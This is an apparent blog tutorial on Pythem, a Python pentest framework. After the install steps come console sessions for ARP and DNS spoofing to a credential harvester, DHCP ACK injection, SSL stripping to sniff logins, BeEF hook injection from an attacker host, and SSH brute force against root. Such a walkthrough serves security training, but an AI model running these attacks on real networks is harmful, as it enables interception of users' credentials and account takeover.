Tutorials

Pythem – Multi-Purpose Pentest Framework 2017

Pythem is a multi-purpose pentest framework written in Python. It has been developed to be used by security researchers and security professionals. The tool intended to be used only for acts within the law.

Features –

  • Only runs on GNU/Linux OS.
  • Based on Python
  • Easy to install and use

Supported attacks –

  • ARP spoofing – Man-in-the-middle (MITM).
  • Man-in-the-middle HSTS bypass – Strip SSL
  • ARP+DNS spoof – fake page redirect to credential harvester
  • DHCP ACK Injection spoofing – Man-in-the-middle
  • Man-in-the-middle inject BeEF hook
  • SSH Brute-Force attack.
  • Web page formulary brute-force
  • URL content buster
  • Overthrow the DNS of LAN range/IP address
  • Redirect all possible DNS queries to host

This tool is very useful for specially DOS and MITM attacks over LAN network. You can easily define the target, gateway and interface etc

Installation of Pythem –

Installation can be done via git clone by typing this command:

Command: git clone https://github.com/m4n3dw0lf/pythem

Before to run, we have to give full permissions to install executable binary file because we need to install some dependencies which you can easily find from requirements.txt file.

For permissions, the command is “chmod +x install“.

After complete installation, just type “pythem” in your terminal.

To view all commands and information about pythem, just type help in same terminal.

ARP spoofing – Man-in-the-middle

pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
pythem> sniff
[+] Enter the filter: core

ARP+DNS spoof – fake page redirect to credential harvester

pythem> set target 192.168.179.142
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: example.com
[+] Default address to redirect is:192.168.0.6 do you want to change?[y/n]n
[+] DNS spoofing initialized.
pythem> sniff core

Man-in-the-middle DHCP spoofing – DHCP ACK Injection

pythem> dhcpspoof start
[+] DHCP Server IP address: 192.168.1.1
[+] Broadcast address: 192.168.1.255
[+] Subnet mask: 255.255.255.0
[+] Router IP address: 192.168.1.1
[+] Domain: home
[+] DNS Server IP address: 192.168.1.4 (fake)
[+] DHCP spoofing initialized.
pythem> sniff core

Man-in-the-middle HSTS bypass – Strip SSL

pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> set target 192.168.179.142
pythem> hstsbypass
pythem> sniff core

As soon as in target machine when someone login to gmail.com or any other https based site, it will sniff the login credentials in clear text as shown below:

Man-in-the-middle inject BeEF hook

Start BeEF xss framework and get the hook script url

pythem> set interface eth0
pythem> set target 192.168.179.142
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> redirect start
[+] Enter the script source: http://192.168.179.145:3000/hook.js
[+] Redirect with script injection initialized.
[+] Injection URL – http://192.168.179.145:80
[+] Target was requesting: waccounts.google.com
[+] Script Injected on: (‘192.168.179.1’, 27813)

SSH Brute-Force attack

pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute ssh
[+] Enter the username to bruteforce: root

Have something to say about this article? Comment below or share it with us on Facebook or Twitter.

H4ck0
Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.
https://www.yeahhub.com/

WHERE SHOULD WE SEND

HACKING TUTORIALS & INFOSEC NEWS?

Subscribe to Our Newsletter and Get Instant Delivered to Your Email Inbox.

We respect your privacy and take protecting it seriously.

Leave a Reply

Your email address will not be published. Required fields are marked *

nineteen − eleven =